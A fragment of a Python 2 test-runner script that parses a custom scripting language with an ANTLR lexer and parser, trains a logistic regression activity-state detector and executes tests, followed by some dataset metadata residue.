print "---> TEST FAILED...\n"
def main(argv):
# Setting the input file containing the input string
# input = FileStream("./input.txt")
input = FileStream("./../outputFiles/outputScript.txt")
# Instantiating the Lexer
lexer = scriptingLanguageLexer(input)
stream = CommonTokenStream(lexer)
# Instantiating the Parser
parser = scriptingLanguageParser(stream)
# Calling the ROOT of the parser (it will have the same name as the most upper parser token)
tree = parser.suite()
# Instantiating the suiteClass object
suiteObject = suiteClass()
# Instantiating the Listener
results = scriptingLanguageListener(suiteObject)
walker = ParseTreeWalker()
walker.walk(results, tree)
# Preparing the Logistic Regression model
logisticRegr = activityStateDetector.trainModel()
# EXECUTING THE TESTS
executeTests(suiteObject, logisticRegr)
if __name__ == '__main__':
main(sys.argv) | {"/graphPlotter.py": ["/stateNode.py"]} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.